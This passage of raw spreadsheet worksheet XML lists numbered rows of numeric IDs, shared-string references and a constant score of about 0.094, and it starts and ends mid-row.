      <c r="D22848" s="2">
        <v>1.0</v>
      </c>
      <c r="E22848" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22848" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22849" ht="15.75" customHeight="1">
      <c r="A22849" s="1">
        <v>5913.0</v>
      </c>
      <c r="B22849" s="2">
        <v>4.7202668E7</v>
      </c>
      <c r="C22849" s="2" t="s">
        <v>22067</v>
      </c>
      <c r="D22849" s="2">
        <v>1.0</v>
      </c>
      <c r="E22849" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22849" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22850" ht="15.75" customHeight="1">
      <c r="A22850" s="1">
        <v>6265.0</v>
      </c>
      <c r="B22850" s="2">
        <v>4.8118409E7</v>
      </c>
      <c r="C22850" s="2" t="s">
        <v>22068</v>
      </c>
      <c r="D22850" s="2">
        <v>1.0</v>
      </c>
      <c r="E22850" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22850" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22851" ht="15.75" customHeight="1">
      <c r="A22851" s="1">
        <v>6686.0</v>
      </c>
      <c r="B22851" s="2">
        <v>4.9179821E7</v>
      </c>
      <c r="C22851" s="2" t="s">
        <v>22069</v>
      </c>
      <c r="D22851" s="2">
        <v>1.0</v>
      </c>
      <c r="E22851" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22851" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22852" ht="15.75" customHeight="1">
      <c r="A22852" s="1">
        <v>7199.0</v>
      </c>
      <c r="B22852" s="2">
        <v>5.0593656E7</v>
      </c>
      <c r="C22852" s="2" t="s">
        <v>22070</v>
      </c>
      <c r="D22852" s="2">
        <v>1.0</v>
      </c>
      <c r="E22852" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22852" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22853" ht="15.75" customHeight="1">
      <c r="A22853" s="1">
        <v>8386.0</v>
      </c>
      <c r="B22853" s="2">
        <v>5.3826696E7</v>
      </c>
      <c r="C22853" s="2" t="s">
        <v>22071</v>
      </c>
      <c r="D22853" s="2">
        <v>1.0</v>
      </c>
      <c r="E22853" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22853" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22854" ht="15.75" customHeight="1">
      <c r="A22854" s="1">
        <v>8691.0</v>
      </c>
      <c r="B22854" s="2">
        <v>5.4409639E7</v>
      </c>
      <c r="C22854" s="2" t="s">
        <v>22072</v>
      </c>
      <c r="D22854" s="2">
        <v>1.0</v>
      </c>
      <c r="E22854" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22854" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22855" ht="15.75" customHeight="1">
      <c r="A22855" s="1">
        <v>9237.0</v>
      </c>
      <c r="B22855" s="2">
        <v>5.5464288E7</v>
      </c>
      <c r="C22855" s="2" t="s">
        <v>22073</v>
      </c>
      <c r="D22855" s="2">
        <v>1.0</v>
      </c>
      <c r="E22855" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22855" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22856" ht="15.75" customHeight="1">
      <c r="A22856" s="1">
        <v>10261.0</v>
      </c>
      <c r="B22856" s="2">
        <v>5.7573873E7</v>
      </c>
      <c r="C22856" s="2" t="s">
        <v>22074</v>
      </c>
      <c r="D22856" s="2">
        <v>1.0</v>
      </c>
      <c r="E22856" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22856" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22857" ht="15.75" customHeight="1">
      <c r="A22857" s="1">
        <v>10609.0</v>
      </c>
      <c r="B22857" s="2">
        <v>1.3673196E7</v>
      </c>
      <c r="C22857" s="2" t="s">
        <v>22075</v>
      </c>
      <c r="D22857" s="2">
        <v>1.0</v>
      </c>
      <c r="E22857" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22857" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22858" ht="15.75" customHeight="1">
      <c r="A22858" s="1">
        <v>10737.0</v>
      </c>
      <c r="B22858" s="2">
        <v>1.5372855E7</v>
      </c>
      <c r="C22858" s="2" t="s">
        <v>22076</v>
      </c>
      <c r="D22858" s="2">
        <v>1.0</v>
      </c>
      <c r="E22858" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22858" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22859" ht="15.75" customHeight="1">
      <c r="A22859" s="1">
        <v>11007.0</v>
      </c>
      <c r="B22859" s="2">
        <v>1.7696423E7</v>
      </c>
      <c r="C22859" s="2" t="s">
        <v>22077</v>
      </c>
      <c r="D22859" s="2">
        <v>1.0</v>
      </c>
      <c r="E22859" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22859" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22860" ht="15.75" customHeight="1">
      <c r="A22860" s="1">
        <v>11536.0</v>
      </c>
      <c r="B22860" s="2">
        <v>2.2571972E7</v>
      </c>
      <c r="C22860" s="2" t="s">
        <v>22078</v>
      </c>
      <c r="D22860" s="2">
        <v>1.0</v>
      </c>
      <c r="E22860" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22860" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22861" ht="15.75" customHeight="1">
      <c r="A22861" s="1">
        <v>12075.0</v>
      </c>
      <c r="B22861" s="2">
        <v>2.6658589E7</v>
      </c>
      <c r="C22861" s="2" t="s">
        <v>22079</v>
      </c>
      <c r="D22861" s="2">
        <v>1.0</v>
      </c>
      <c r="E22861" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22861" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22862" ht="15.75" customHeight="1">
      <c r="A22862" s="1">
        <v>12368.0</v>
      </c>
      <c r="B22862" s="2">
        <v>2.8795935E7</v>
      </c>
      <c r="C22862" s="2" t="s">
        <v>22080</v>
      </c>
      <c r="D22862" s="2">
        <v>1.0</v>
      </c>
      <c r="E22862" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22862" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22863" ht="15.75" customHeight="1">
      <c r="A22863" s="1">
        <v>12536.0</v>
      </c>
      <c r="B22863" s="2">
        <v>2.9798344E7</v>
      </c>
      <c r="C22863" s="2" t="s">
        <v>22081</v>
      </c>
      <c r="D22863" s="2">
        <v>1.0</v>
      </c>
      <c r="E22863" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22863" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22864" ht="15.75" customHeight="1">
      <c r="A22864" s="1">
        <v>13954.0</v>
      </c>
      <c r="B22864" s="2">
        <v>3.729531E7</v>
      </c>
      <c r="C22864" s="2" t="s">
        <v>22082</v>
      </c>
      <c r="D22864" s="2">
        <v>1.0</v>
      </c>
      <c r="E22864" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22864" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22865" ht="15.75" customHeight="1">
      <c r="A22865" s="1">
        <v>14459.0</v>
      </c>
      <c r="B22865" s="2">
        <v>3.9459757E7</v>
      </c>
      <c r="C22865" s="2" t="s">
        <v>22083</v>
      </c>
      <c r="D22865" s="2">
        <v>1.0</v>
      </c>
      <c r="E22865" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22865" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22866" ht="15.75" customHeight="1">
      <c r="A22866" s="1">
        <v>14777.0</v>
      </c>
      <c r="B22866" s="2">
        <v>4.0878001E7</v>
      </c>
      <c r="C22866" s="2" t="s">
        <v>22084</v>
      </c>
      <c r="D22866" s="2">
        <v>1.0</v>
      </c>
      <c r="E22866" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22866" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22867" ht="15.75" customHeight="1">
      <c r="A22867" s="1">
        <v>15862.0</v>
      </c>
      <c r="B22867" s="2">
        <v>4.449615E7</v>
      </c>
      <c r="C22867" s="2" t="s">
        <v>22085</v>
      </c>
      <c r="D22867" s="2">
        <v>1.0</v>
      </c>
      <c r="E22867" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22867" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22868" ht="15.75" customHeight="1">
      <c r="A22868" s="1">
        <v>15983.0</v>
      </c>
      <c r="B22868" s="2">
        <v>4.4912713E7</v>
      </c>
      <c r="C22868" s="2" t="s">
        <v>22086</v>
      </c>
      <c r="D22868" s="2">
        <v>1.0</v>
      </c>
      <c r="E22868" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22868" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22869" ht="15.75" customHeight="1">
      <c r="A22869" s="1">
        <v>16049.0</v>
      </c>
      <c r="B22869" s="2">
        <v>4.5217835E7</v>
      </c>
      <c r="C22869" s="2" t="s">
        <v>22087</v>
      </c>
      <c r="D22869" s="2">
        <v>1.0</v>
      </c>
      <c r="E22869" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22869" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22870" ht="15.75" customHeight="1">
      <c r="A22870" s="1">
        <v>16127.0</v>
      </c>
      <c r="B22870" s="2">
        <v>4.5501079E7</v>
      </c>
      <c r="C22870" s="2" t="s">
        <v>22088</v>
      </c>
      <c r="D22870" s="2">
        <v>1.0</v>
      </c>
      <c r="E22870" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22870" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22871" ht="15.75" customHeight="1">
      <c r="A22871" s="1">
        <v>16249.0</v>
      </c>
      <c r="B22871" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C22871" s="2" t="s">
        <v>22089</v>
      </c>
      <c r="D22871" s="2">
        <v>1.0</v>
      </c>
      <c r="E22871" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22871" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22872" ht="15.75" customHeight="1">
      <c r="A22872" s="1">
        <v>16382.0</v>
      </c>
      <c r="B22872" s="2">
        <v>4.6207121E7</v>
      </c>
      <c r="C22872" s="2" t="s">
        <v>22090</v>
      </c>
      <c r="D22872" s="2">
        <v>1.0</v>
      </c>
      <c r="E22872" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22872" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22873" ht="15.75" customHeight="1">
      <c r="A22873" s="1">
        <v>16849.0</v>
      </c>
      <c r="B22873" s="2">
        <v>4.7910396E7</v>
      </c>
      <c r="C22873" s="2" t="s">
        <v>22091</v>
      </c>
      <c r="D22873" s="2">
        <v>1.0</v>
      </c>
      <c r="E22873" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22873" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22874" ht="15.75" customHeight="1">
      <c r="A22874" s="1">
        <v>16858.0</v>
      </c>
      <c r="B22874" s="2">
        <v>4.7929236E7</v>
      </c>
      <c r="C22874" s="2" t="s">
        <v>22092</v>
      </c>
      <c r="D22874" s="2">
        <v>1.0</v>
      </c>
      <c r="E22874" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22874" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22875" ht="15.75" customHeight="1">
      <c r="A22875" s="1">
        <v>17449.0</v>
      </c>
      <c r="B22875" s="2">
        <v>4.9807491E7</v>
      </c>
      <c r="C22875" s="2" t="s">
        <v>22093</v>
      </c>
      <c r="D22875" s="2">
        <v>1.0</v>
      </c>
      <c r="E22875" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22875" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22876" ht="15.75" customHeight="1">
      <c r="A22876" s="1">
        <v>18076.0</v>
      </c>
      <c r="B22876" s="2">
        <v>5.1622917E7</v>
      </c>
      <c r="C22876" s="2" t="s">
        <v>22094</v>
      </c>
      <c r="D22876" s="2">
        <v>1.0</v>
      </c>
      <c r="E22876" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22876" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22877" ht="15.75" customHeight="1">
      <c r="A22877" s="1">
        <v>18082.0</v>
      </c>
      <c r="B22877" s="2">
        <v>5.1637612E7</v>
      </c>
      <c r="C22877" s="2" t="s">
        <v>22095</v>
      </c>
      <c r="D22877" s="2">
        <v>1.0</v>
      </c>
      <c r="E22877" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22877" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22878" ht="15.75" customHeight="1">
      <c r="A22878" s="1">
        <v>18100.0</v>
      </c>
      <c r="B22878" s="2">
        <v>5.1707042E7</v>
      </c>
      <c r="C22878" s="2" t="s">
        <v>22096</v>
      </c>
      <c r="D22878" s="2">
        <v>1.0</v>
      </c>
      <c r="E22878" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22878" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22879" ht="15.75" customHeight="1">
      <c r="A22879" s="1">
        <v>18729.0</v>
      </c>
      <c r="B22879" s="2">
        <v>5.3695342E7</v>
      </c>
      <c r="C22879" s="2" t="s">
        <v>22097</v>
      </c>
      <c r="D22879" s="2">
        <v>1.0</v>
      </c>
      <c r="E22879" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22879" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22880" ht="15.75" customHeight="1">
      <c r="A22880" s="1">
        <v>19308.0</v>
      </c>
      <c r="B22880" s="2">
        <v>5.5264084E7</v>
      </c>
      <c r="C22880" s="2" t="s">
        <v>22098</v>
      </c>
      <c r="D22880" s="2">
        <v>1.0</v>
      </c>
      <c r="E22880" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22880" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22881" ht="15.75" customHeight="1">
      <c r="A22881" s="1">
        <v>19648.0</v>
      </c>
      <c r="B22881" s="2">
        <v>5.6321187E7</v>
      </c>
      <c r="C22881" s="2" t="s">
        <v>22099</v>
      </c>
      <c r="D22881" s="2">
        <v>1.0</v>
      </c>
      <c r="E22881" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22881" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22882" ht="15.75" customHeight="1">
      <c r="A22882" s="1">
        <v>20468.0</v>
      </c>
      <c r="B22882" s="2">
        <v>1.277861E7</v>
      </c>
      <c r="C22882" s="2" t="s">
        <v>22100</v>
      </c>
      <c r="D22882" s="2">
        <v>1.0</v>
      </c>
      <c r="E22882" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22882" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22883" ht="15.75" customHeight="1">
      <c r="A22883" s="1">
        <v>21717.0</v>
      </c>
      <c r="B22883" s="2">
        <v>2.5498752E7</v>
      </c>
      <c r="C22883" s="2" t="s">
        <v>22101</v>
      </c>
      <c r="D22883" s="2">
        <v>1.0</v>
      </c>
      <c r="E22883" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22883" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22884" ht="15.75" customHeight="1">
      <c r="A22884" s="1">
        <v>22063.0</v>
      </c>
      <c r="B22884" s="2">
        <v>3.0542776E7</v>
      </c>
      <c r="C22884" s="2" t="s">
        <v>22102</v>
      </c>
      <c r="D22884" s="2">
        <v>1.0</v>
      </c>
      <c r="E22884" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22884" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22885" ht="15.75" customHeight="1">
      <c r="A22885" s="1">
        <v>22773.0</v>
      </c>
      <c r="B22885" s="2">
        <v>4.4987438E7</v>
      </c>
      <c r="C22885" s="2" t="s">
        <v>13361</v>
      </c>
      <c r="D22885" s="2">
        <v>1.0</v>
      </c>
      <c r="E22885" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22885" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22886" ht="15.75" customHeight="1">
      <c r="A22886" s="1">
        <v>22775.0</v>
      </c>
      <c r="B22886" s="2">
        <v>4.4987451E7</v>
      </c>
      <c r="C22886" s="2" t="s">
        <v>13361</v>
      </c>
      <c r="D22886" s="2">
        <v>1.0</v>
      </c>
      <c r="E22886" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22886" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22887" ht="15.75" customHeight="1">
      <c r="A22887" s="1">
        <v>23887.0</v>
      </c>
      <c r="B22887" s="2">
        <v>8405347.0</v>
      </c>
      <c r="C22887" s="2" t="s">
        <v>22103</v>
      </c>
      <c r="D22887" s="2">
        <v>1.0</v>
      </c>
      <c r="E22887" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22887" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22888" ht="15.75" customHeight="1">
      <c r="A22888" s="1">
        <v>24263.0</v>
      </c>
      <c r="B22888" s="2">
        <v>1.052486E7</v>
      </c>
      <c r="C22888" s="2" t="s">
        <v>22104</v>
      </c>
      <c r="D22888" s="2">
        <v>1.0</v>
      </c>
      <c r="E22888" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22888" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22889" ht="15.75" customHeight="1">
      <c r="A22889" s="1">
        <v>25011.0</v>
      </c>
      <c r="B22889" s="2">
        <v>1.2778609E7</v>
      </c>
      <c r="C22889" s="2" t="s">
        <v>22100</v>
      </c>
      <c r="D22889" s="2">
        <v>1.0</v>
      </c>
      <c r="E22889" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22889" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22890" ht="15.75" customHeight="1">
      <c r="A22890" s="1">
        <v>25658.0</v>
      </c>
      <c r="B22890" s="2">
        <v>1.4523187E7</v>
      </c>
      <c r="C22890" s="2" t="s">
        <v>22105</v>
      </c>
      <c r="D22890" s="2">
        <v>1.0</v>
      </c>
      <c r="E22890" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22890" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22891" ht="15.75" customHeight="1">
      <c r="A22891" s="1">
        <v>25718.0</v>
      </c>
      <c r="B22891" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C22891" s="2" t="s">
        <v>22106</v>
      </c>
      <c r="D22891" s="2">
        <v>1.0</v>
      </c>
      <c r="E22891" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22891" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22892" ht="15.75" customHeight="1">
      <c r="A22892" s="1">
        <v>26970.0</v>
      </c>
      <c r="B22892" s="2">
        <v>1.9640834E7</v>
      </c>
      <c r="C22892" s="2" t="s">
        <v>22107</v>
      </c>
      <c r="D22892" s="2">
        <v>1.0</v>
      </c>
      <c r="E22892" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22892" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22893" ht="15.75" customHeight="1">
      <c r="A22893" s="1">
        <v>27382.0</v>
      </c>
      <c r="B22893" s="2">
        <v>2.1750289E7</v>
      </c>
      <c r="C22893" s="2" t="s">
        <v>22108</v>
      </c>
      <c r="D22893" s="2">
        <v>1.0</v>
      </c>
      <c r="E22893" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22893" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22894" ht="15.75" customHeight="1">
      <c r="A22894" s="1">
        <v>27874.0</v>
      </c>
      <c r="B22894" s="2">
        <v>2.3548873E7</v>
      </c>
      <c r="C22894" s="2" t="s">
        <v>22109</v>
      </c>
      <c r="D22894" s="2">
        <v>1.0</v>
      </c>
      <c r="E22894" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22894" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22895" ht="15.75" customHeight="1">
      <c r="A22895" s="1">
        <v>28071.0</v>
      </c>
      <c r="B22895" s="2">
        <v>2.4628951E7</v>
      </c>
      <c r="C22895" s="2" t="s">
        <v>22110</v>
      </c>
      <c r="D22895" s="2">
        <v>1.0</v>
      </c>
      <c r="E22895" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22895" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22896" ht="15.75" customHeight="1">
      <c r="A22896" s="1">
        <v>29613.0</v>
      </c>
      <c r="B22896" s="2">
        <v>3.3621469E7</v>
      </c>
      <c r="C22896" s="2" t="s">
        <v>22111</v>
      </c>
      <c r="D22896" s="2">
        <v>1.0</v>
      </c>
      <c r="E22896" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22896" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22897" ht="15.75" customHeight="1">
      <c r="A22897" s="1">
        <v>30153.0</v>
      </c>
      <c r="B22897" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C22897" s="2" t="s">
        <v>22112</v>
      </c>
      <c r="D22897" s="2">
        <v>1.0</v>
      </c>
      <c r="E22897" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22897" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22898" ht="15.75" customHeight="1">
      <c r="A22898" s="1">
        <v>30790.0</v>
      </c>
      <c r="B22898" s="2">
        <v>4.4987437E7</v>
      </c>
      <c r="C22898" s="2" t="s">
        <v>13361</v>
      </c>
      <c r="D22898" s="2">
        <v>1.0</v>
      </c>
      <c r="E22898" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22898" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22899" ht="15.75" customHeight="1">
      <c r="A22899" s="1">
        <v>30980.0</v>
      </c>
      <c r="B22899" s="2">
        <v>4.7524183E7</v>
      </c>
      <c r="C22899" s="2" t="s">
        <v>22113</v>
      </c>
      <c r="D22899" s="2">
        <v>1.0</v>
      </c>
      <c r="E22899" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22899" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22900" ht="15.75" customHeight="1">
      <c r="A22900" s="1">
        <v>31355.0</v>
      </c>
      <c r="B22900" s="2">
        <v>4986311.0</v>
      </c>
      <c r="C22900" s="2" t="s">
        <v>22114</v>
      </c>
      <c r="D22900" s="2">
        <v>1.0</v>
      </c>
      <c r="E22900" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22900" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22901" ht="15.75" customHeight="1">
      <c r="A22901" s="1">
        <v>31486.0</v>
      </c>
      <c r="B22901" s="2">
        <v>5.052564E7</v>
      </c>
      <c r="C22901" s="2" t="s">
        <v>22115</v>
      </c>
      <c r="D22901" s="2">
        <v>1.0</v>
      </c>
      <c r="E22901" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22901" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22902" ht="15.75" customHeight="1">
      <c r="A22902" s="1">
        <v>31944.0</v>
      </c>
      <c r="B22902" s="2">
        <v>5309210.0</v>
      </c>
      <c r="C22902" s="2" t="s">
        <v>22116</v>
      </c>
      <c r="D22902" s="2">
        <v>1.0</v>
      </c>
      <c r="E22902" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22902" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22903" ht="15.75" customHeight="1">
      <c r="A22903" s="1">
        <v>32313.0</v>
      </c>
      <c r="B22903" s="2">
        <v>5.571586E7</v>
      </c>
      <c r="C22903" s="2" t="s">
        <v>22117</v>
      </c>
      <c r="D22903" s="2">
        <v>1.0</v>
      </c>
      <c r="E22903" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22903" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22904" ht="15.75" customHeight="1">
      <c r="A22904" s="1">
        <v>32824.0</v>
      </c>
      <c r="B22904" s="2">
        <v>6218222.0</v>
      </c>
      <c r="C22904" s="2" t="s">
        <v>22118</v>
      </c>
      <c r="D22904" s="2">
        <v>1.0</v>
      </c>
      <c r="E22904" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22904" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22905" ht="15.75" customHeight="1">
      <c r="A22905" s="1">
        <v>33073.0</v>
      </c>
      <c r="B22905" s="2">
        <v>6876856.0</v>
      </c>
      <c r="C22905" s="2" t="s">
        <v>22119</v>
      </c>
      <c r="D22905" s="2">
        <v>1.0</v>
      </c>
      <c r="E22905" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22905" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22906" ht="15.75" customHeight="1">
      <c r="A22906" s="1">
        <v>33456.0</v>
      </c>
      <c r="B22906" s="2">
        <v>7892651.0</v>
      </c>
      <c r="C22906" s="2" t="s">
        <v>22120</v>
      </c>
      <c r="D22906" s="2">
        <v>1.0</v>
      </c>
      <c r="E22906" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22906" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22907" ht="15.75" customHeight="1">
      <c r="A22907" s="1">
        <v>33751.0</v>
      </c>
      <c r="B22907" s="2">
        <v>8588893.0</v>
      </c>
      <c r="C22907" s="5" t="s">
        <v>22121</v>
      </c>
      <c r="D22907" s="2">
        <v>1.0</v>
      </c>
      <c r="E22907" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22907" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="22908" ht="15.75" customHeight="1">
      <c r="A22908" s="1">
        <v>3328.0</v>
      </c>
      <c r="B22908" s="2">
        <v>3.7682621E7</v>
      </c>
      <c r="C22908" s="2" t="s">
        <v>22122</v>
      </c>
      <c r="D22908" s="2">
        <v>1.0</v>
      </c>
      <c r="E22908" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22908" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="22909" ht="15.75" customHeight="1">
      <c r="A22909" s="1">
        <v>7715.0</v>
      </c>
      <c r="B22909" s="2">
        <v>5.2020976E7</v>
      </c>
      <c r="C22909" s="2" t="s">
        <v>22123</v>
      </c>
      <c r="D22909" s="2">
        <v>1.0</v>
      </c>
      <c r="E22909" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22909" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="22910" ht="15.75" customHeight="1">
      <c r="A22910" s="1">
        <v>16346.0</v>
      </c>
      <c r="B22910" s="2">
        <v>4.6087516E7</v>
      </c>
      <c r="C22910" s="2" t="s">
        <v>22124</v>
      </c>
      <c r="D22910" s="2">
        <v>1.0</v>
      </c>
      <c r="E22910" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22910" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="22911" ht="15.75" customHeight="1">
      <c r="A22911" s="1">
        <v>22303.0</v>
      </c>
      <c r="B22911" s="2">
        <v>3.3673805E7</v>
      </c>
      <c r="C22911" s="2" t="s">
        <v>22125</v>
      </c>
      <c r="D22911" s="2">
        <v>1.0</v>
      </c>
      <c r="E22911" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22911" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="22912" ht="15.75" customHeight="1">
      <c r="A22912" s="1">
        <v>27692.0</v>
      </c>
      <c r="B22912" s="2">
        <v>2.3011771E7</v>
      </c>
      <c r="C22912" s="2" t="s">
        <v>22126</v>
      </c>
      <c r="D22912" s="2">
        <v>1.0</v>
      </c>
      <c r="E22912" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22912" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="22913" ht="15.75" customHeight="1">
      <c r="A22913" s="1">
        <v>31026.0</v>
      </c>
      <c r="B22913" s="2">
        <v>4.7792028E7</v>
      </c>
      <c r="C22913" s="2" t="s">
        <v>22127</v>
      </c>
      <c r="D22913" s="2">
        <v>1.0</v>
      </c>
      <c r="E22913" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22913" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="22914" ht="15.75" customHeight="1">
      <c r="A22914" s="1">
        <v>31242.0</v>
      </c>
      <c r="B22914" s="2">
        <v>4930139.0</v>
      </c>
      <c r="C22914" s="2" t="s">
        <v>22128</v>
      </c>
      <c r="D22914" s="2">
        <v>1.0</v>
      </c>
      <c r="E22914" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22914" s="2">
        <v>0.09393939393939393</v>
      </c>
    </row>
    <row r="22915" ht="15.75" customHeight="1">
      <c r="A22915" s="1">
        <v>31752.0</v>
      </c>
      <c r="B22915" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C22915" s="2" t="s">
        <v>22129</v>
      </c>
      <c r="D22915" s="2">
